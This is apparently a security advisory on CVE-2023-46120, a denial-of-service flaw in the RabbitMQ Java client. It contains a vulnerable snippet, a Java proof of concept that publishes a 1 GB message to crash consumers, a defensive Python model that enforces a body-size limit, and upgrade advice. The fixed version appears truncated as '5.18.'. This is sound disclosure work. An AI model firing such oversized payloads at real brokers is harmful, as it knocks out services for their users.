RabbitMQ, a widely used message broker, provides Java and JVM-based applications with a Java client library for connecting to and interacting with RabbitMQ nodes. A recently disclosed vulnerability in the RabbitMQ Java client library (prior to version 5.18.) allows an attacker to mount a Denial of Service (DoS) attack: an oversized message causes a memory overflow in the consuming application and triggers an Out Of Memory (OOM) error. This post discusses the vulnerability in depth, with code snippets, links to the original references, and details on how to mitigate the risk.

Vulnerability Details

The root cause lies in the Delivery class's handling of received Message objects. The configured maxBodyLength parameter was not taken into account, so the client buffered message bodies of any size and became vulnerable to memory exhaustion when processing excessively large Message objects.

The following simplified snippet demonstrates how the maxBodyLength parameter is not enforced when a delivery is constructed:

import com.rabbitmq.client.AMQP;
import com.rabbitmq.client.Channel;

public class Delivery {
    private final Channel channel;
    private final long deliveryTag;
    private final boolean redelivered;
    private final byte[] body;

    public Delivery(Channel channel, long deliveryTag, boolean redelivered, String exchange,
                    String routingKey, AMQP.BasicProperties props, byte[] body) {
        this.channel = channel;
        this.deliveryTag = deliveryTag;
        this.redelivered = redelivered;
        // maxBodyLength is never consulted: the body is stored at whatever size arrived
        this.body = body;
    }
}

An attacker could exploit this by publishing a message with an oversized payload, as in the snippet below:

import com.rabbitmq.client.Channel;
import com.rabbitmq.client.Connection;
import com.rabbitmq.client.ConnectionFactory;

import java.io.IOException;
import java.util.concurrent.TimeoutException;

public class Attack {
    public static void main(String[] args) {
        ConnectionFactory factory = new ConnectionFactory();
        factory.setHost("localhost");

        try (Connection connection = factory.newConnection();
             Channel channel = connection.createChannel()) {
            channel.queueDeclare("queue", false, false, false, null);

            byte[] largeMessage = new byte[1024 * 1024 * 1024]; // 1GB payload
            java.util.Arrays.fill(largeMessage, (byte) 'A');

            channel.basicPublish("", "queue", null, largeMessage);
            System.out.println("Sent malicious message with large payload");
        } catch (IOException | TimeoutException e) {
            e.printStackTrace();
        }
    }
}

When a consumer built on the vulnerable RabbitMQ Java client receives such a message, it tries to buffer the whole body, exhausts available memory, and fails with an OOM error. The consuming application is thereby denied service.
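The defensive principle behind the fix is that a message size limit has to be applied to the size the peer declares, before any buffer for the body is allocated, and again as body bytes arrive. The following is an added example, not code from the original post or from the RabbitMQ project: a small Python model of AMQP 0-9-1 content framing (content header carrying the 64-bit body size, followed by body frames) with a configurable limit in the role of maxBodyLength. The frame layout follows the AMQP 0-9-1 specification; the frames, the 64 MiB default limit and the 1 KiB limit used in `demo()` are constructed for this example and are not the library's own values.

```python
"""Added example: enforce a maximum body length on AMQP 0-9-1 content frames
before allocating body storage. Frames and limits below are constructed here;
this is not the RabbitMQ Java client's implementation."""
import struct

FRAME_HEADER = 2          # AMQP 0-9-1 content header frame type
FRAME_BODY = 3            # AMQP 0-9-1 content body frame type
FRAME_END = 0xCE          # frame-end octet
CLASS_BASIC = 60          # class-id of the Basic content class
DEFAULT_MAX_BODY_LENGTH = 64 * 1024 * 1024  # assumed limit for this example


class OversizedMessageError(Exception):
    """A content header declared, or body frames delivered, more bytes than allowed."""


def build_frame(frame_type: int, channel: int, payload: bytes) -> bytes:
    """Wire format: type(1) channel(2) size(4) payload frame-end(1), big-endian."""
    return struct.pack(">BHI", frame_type, channel, len(payload)) + payload + bytes([FRAME_END])


def build_content_header(channel: int, body_size: int) -> bytes:
    """Basic content header: class-id, weight 0, body-size, no property flags."""
    return build_frame(FRAME_HEADER, channel, struct.pack(">HHQH", CLASS_BASIC, 0, body_size, 0))


def parse_frame(frame: bytes) -> tuple:
    """Split a frame into (type, channel, payload), checking size and end marker."""
    if len(frame) < 8:
        raise ValueError("frame too short")
    frame_type, channel, size = struct.unpack(">BHI", frame[:7])
    if len(frame) != 7 + size + 1 or frame[-1] != FRAME_END:
        raise ValueError("frame length or end marker mismatch")
    return frame_type, channel, frame[7:7 + size]


def declared_body_size(header_payload: bytes, max_body_length: int) -> int:
    """Read body-size from the content header and reject it before anything is allocated."""
    if len(header_payload) < 14:
        raise ValueError("content header payload too short")
    class_id, _weight, body_size, _flags = struct.unpack(">HHQH", header_payload[:14])
    if class_id != CLASS_BASIC:
        raise ValueError(f"unexpected content class {class_id}")
    if body_size > max_body_length:
        raise OversizedMessageError(f"declared body {body_size} bytes exceeds limit {max_body_length}")
    return body_size


def assemble_message(frames: list, max_body_length: int = DEFAULT_MAX_BODY_LENGTH) -> bytes:
    """Reassemble one message from its content header and body frames.

    The limit is checked on the declared size (so a header announcing 1 GiB is
    refused without allocating) and on the running total of body bytes (so a
    peer cannot declare a small body and then keep streaming frames)."""
    frame_type, _channel, header_payload = parse_frame(frames[0])
    if frame_type != FRAME_HEADER:
        raise ValueError("message must start with a content header frame")
    expected = declared_body_size(header_payload, max_body_length)
    body = bytearray()
    for raw in frames[1:]:
        frame_type, _channel, chunk = parse_frame(raw)
        if frame_type != FRAME_BODY:
            raise ValueError("expected a body frame")
        if len(body) + len(chunk) > expected:
            raise OversizedMessageError("body frames exceed the declared body size")
        body += chunk
    if len(body) != expected:
        raise ValueError("incomplete message body")
    return bytes(body)


def demo() -> dict:
    """Run three constructed messages through the assembler with a 1 KiB limit."""
    limit = 1024  # small assumed limit so the example runs instantly
    cases = {
        "small": [build_content_header(1, 5), build_frame(FRAME_BODY, 1, b"hello")],
        # header declares 1 GiB; the rejection happens before any body frame is read
        "huge": [build_content_header(1, 1024 * 1024 * 1024)],
        # header declares 5 bytes but 7 bytes of body follow
        "overrun": [build_content_header(1, 5), build_frame(FRAME_BODY, 1, b"hello"),
                    build_frame(FRAME_BODY, 1, b"!!")],
    }
    results = {}
    for name, frames in cases.items():
        try:
            results[name] = assemble_message(frames, limit)
        except OversizedMessageError as exc:
            results[name] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case}: {outcome!r}")
```

The point of checking the header first is that the declared size is all the consumer knows when it decides how much memory to reserve; a limit applied only after the body has been buffered, as in the vulnerable Delivery constructor above, arrives too late to prevent the OOM.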

Original References

1. CVE-2023-46120
2. RabbitMQ Java client library documentation

Vulnerability Patch

The vulnerability has been fixed in RabbitMQ Java client library version 5.18., which correctly enforces the maxBodyLength parameter. Users are strongly advised to upgrade their RabbitMQ Java client library to at least version 5.18. to mitigate this risk.

In conclusion, users of the RabbitMQ Java client library should be aware of this vulnerability and update their library to the latest version. Doing so protects their consumers from this DoS attack and keeps the messaging platform secure and reliable.

Timeline

Published on: 10/25/2023 18:17:00 UTC
Last modified on: 11/01/2023 16:42:00 UTC